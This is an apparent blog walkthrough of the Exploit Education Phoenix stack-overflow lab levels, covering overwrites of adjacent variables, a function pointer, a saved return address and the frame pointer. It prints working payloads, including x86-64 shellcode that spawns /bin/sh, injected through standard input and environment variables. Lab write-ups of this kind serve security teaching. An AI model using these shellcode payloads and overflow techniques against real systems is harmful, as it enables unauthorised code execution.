Unicorn's Blog

Exploit Education: Phoenix - Stack

12 Aug 2024

Stack Zero

The aim is to change the contents of the changeme variable.

...
int main(int argc, char **argv) {
    struct {
        char buffer[64];
        volatile int changeme;
    } locals;
...
    locals.changeme = 0;
    gets(locals.buffer);
...
    if (locals.changeme != 0) {
        puts("Well done, the 'changeme' variable has been changed!");
    } else {
        puts(
            "Uh oh, 'changeme' has not yet been changed. Would you like to try "
            "again?");
    }
...
}

gets has no input length limit, overflow buffer to change changeme.

image

Stack One

The aim is to change the contents of the changeme variable to 0x496c5962

...
int main(int argc, char **argv) {
    struct {
        char buffer[64];
        volatile int changeme;
    } locals;
...
    locals.changeme = 0;
    strcpy(locals.buffer, argv[1]);
...
    if (locals.changeme == 0x496c5962) {
        puts("Well done, you have successfully set changeme to the correct value");
    } else {
        printf("Getting closer! changeme is currently 0x%08x, we want 0x496c5962\n",
            locals.changeme);
    }
...
}

strcpy doesn’t check for destination string’s size, can be overflowed. First try the same payload as Stack Zero

image

Notice that changeme becomes 0x00000061, which is ‘a’ in hex, the target of this challenge is 0x496c5962, changing into ascii and little endian is ‘bYlI’

image

Stack Two

The aim is to change the contents of the changeme variable to 0x0d0a090a

...
int main(int argc, char **argv) {
    struct {
        char buffer[64];
        volatile int changeme;
    } locals;
...
    ptr = getenv("ExploitEducation");
...
    locals.changeme = 0;
    strcpy(locals.buffer, ptr);
...
    if (locals.changeme == 0x0d0a090a) {
        puts("Well done, you have successfully set changeme to the correct value");
    } else {
        printf("Almost! changeme is currently 0x%08x, we want 0x0d0a090a\n",
            locals.changeme);
    }
...
}

Similar to Stack One, modify the target value of payload and use environment variable to pass the payload instead of argument.

image

Stack Three

...
void complete_level() {
  printf("Congratulations, you've finished " LEVELNAME " :-) Well done!\n");
  exit(0);
}
...
int main(int argc, char **argv) {
    struct {
        char buffer[64];
        volatile int (*fp)();
    } locals;
    ...
    locals.fp = NULL;
    gets(locals.buffer);

    if (locals.fp) {
        printf("calling function pointer @ %p\n", locals.fp);
        fflush(stdout);
        locals.fp();
    } else {
        printf("function pointer remains unmodified :~( better luck next time!\n");
    }
    ...
}

Using pwn checksec notice NO PIE, hence the address of complete_level will be the same every time.

image

From gdb finds out that the address of complete_level is 0x40069d.

image

Therefore by overflowing buffer and setting fp to 0x40069d the challenge will be solved.

image

Stack Four

The aim is to execute the function complete_level by modifying the saved return address, and pointing it to the complete_level() function.

...
void complete_level() {
    printf("Congratulations, you've finished " LEVELNAME " :-) Well done!\n");
    exit(0);
}

void start_level() {
    char buffer[64];
    void *ret;

    gets(buffer);

    ret = __builtin_return_address(0);
    printf("and will be returning to %p\n", ret);
}

int main(int argc, char **argv) {
    printf("%s\n", BANNER);
    start_level();
}

First use pattern to find the padding of return address, since the return address becomes 0x6464646464646464, the length of padding should be 24.

image

Next find the address of complete_level.

image

The payload will be 64 (buffer) + 24 (padding to return address) = 88 padding + return address.

image

Stack Five

Can you execve(“/bin/sh”, …) ?

...
void start_level() {
  char buffer[128];
  gets(buffer);
}

int main(int argc, char **argv) {
  printf("%s\n", BANNER);
  start_level();
}

First, find the padding to $rbp is 8 with gdb.

image

Then, setting break point at 0x40059c <start_level+15> call 0x4003f0 <gets@plt> to find that the payload will be store at 0x00007fffffffe5a0.

image

Since the stack is executable, shellcode can be put in payload and overflow $rbp to where the payload is stored, when start_level returns, instead of returning to main, it will return to the payload and run the shellcode to give us shell.

image

After finishing the payload (using shellcode from Exploit Database):

python3 -c "import sys; shellcode = b'\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05'; sys.stdout.buffer.write(shellcode + b'A' * (136 - len(shellcode)) + b'\xa0\xe5\xff\xff\xff\x7f')"

it successfully spawn a shell in gdb.

image

However, running the same payload in command line, it only gets Segmentation fault, no shell is spawned.

image

After a lot of trial and error, nothing can run successfully, until I came across this write-up. With ROPgadget notice there’s a call rax gadget.

image

Setting a breakpoint at 0x4005a3 <start_level+22> ret, discover that $rax is pointing to where the payload is stored.

image

Since the binary has no PIE, we can use the same payload as previous but change the return address to call rax gadget.

image

Successfully spawn shell in command line.

image

Stack Six

Can you execve(“/bin/sh”, …) ?

...
char *what = GREET;

char *greet(char *who) {
  char buffer[128];
  int maxSize;

  maxSize = strlen(who);
  if (maxSize > (sizeof(buffer) - /* ensure null termination */ 1)) {
    maxSize = sizeof(buffer) - 1;
  }

  strcpy(buffer, what);
  strncpy(buffer + strlen(buffer), who, maxSize);

  return strdup(buffer);
}

int main(int argc, char **argv) {
  char *ptr;
  printf("%s\n", BANNER);
...
  ptr = getenv("ExploitEducation");
...
  printf("%s\n", greet(ptr));
  return 0;
}

payload:

export ExploitEducation=$(python3 -c "print('A'*200)")

By setting breakpoint at 0x400745 <greet+72> call 0x400510 <strcpy@plt> and 0x40077d <greet+128> call 0x400550 <strncpy@plt>, the size of GREET can be calculated as 0x00007fffffffe4c2 - 0x00007fffffffe4a0 = 0x22 (34), since we can add another 127 bytes after GREET, 34 + 127 = 161 > 128, buffer will be overflowed.

image

image

Next set break point at 0x400799 <greet+156> pop rbp and 0x4007f6 <main+91> leave to find what has been modified. At breakpoint 0x400799 <greet+156>, both $rsp and $rbp is pointing to the address that we changed by overflowing buffer (0x7fffffffe541), note that only the last byte of address can be changed.

image

image

After executing pop rbp, $rsp is pointing to the next instruction of call 0x4006fd <greet> in main, and $rbp becomes to address we modified.

image

At break point 0x4007f6 <main+91>, notice that $rbp is still the address we modified earlier.

image

After executing leave, which is equivalent to mov rsp, rbp; pop rbp, $rsp becomes the address we modified + 8 (0x7fffffffe549 = 0x7fffffffe541 + 8), hence we know that we can jump to any address that 0x7fffffffe5XX + 8 points at, where XX can be arbitrary byte.

image

Looking memory at 0x7fffffffe5XX, notice the address 0x7fffffffeec7 at 0x7fffffffe568, recall from the previous strncpy, it is the address of who (ptr from main, ExploitEducation from environment variable), also the stack is executable, hence we can put our shellcode in ExploitEducation and modified the address to 0x7fffffffe560.

image

image

payload:

export ExploitEducation=$(python3 -c "import sys; shellcode = b'\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05'; sys.stdout.buffer.write(shellcode + b'\x60' * (200 - len(shellcode)))")

Using the payload (same shell code as previous problem), successfully spawn a shell in gdb.

image

However the payload fails at command line.

image

After using some tips in this write-up, the same payload also fails in gdb.

Quick tips:

  • You can add these lines to “.gdbinit” file to adjust gdb addresses to be more realistic.
    unset env LINES
    unset env COLUMNS
    set env _ /opt/phoenix/amd64/stack-six
    
  • Keep the length of your exploit fixed every time to avoid shifting memory addresses (and to avoid the headache).

Setting breakpoint at 0x4007f7 <main+92> ret, we can see that the address of who is at 0x7fffffffe578 instead of 0x7fffffffe568.

image

payload:

export ExploitEducation=$(python3 -c "import sys; shellcode = b'\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05'; sys.stdout.buffer.write(shellcode + b'\x70' * (200 - len(shellcode)))")

After adjusting the payload, it also works in command line, note that must run /opt/phoenix/amd64/stack-six to success, ./stack/six will result in segmentation fault.

image

image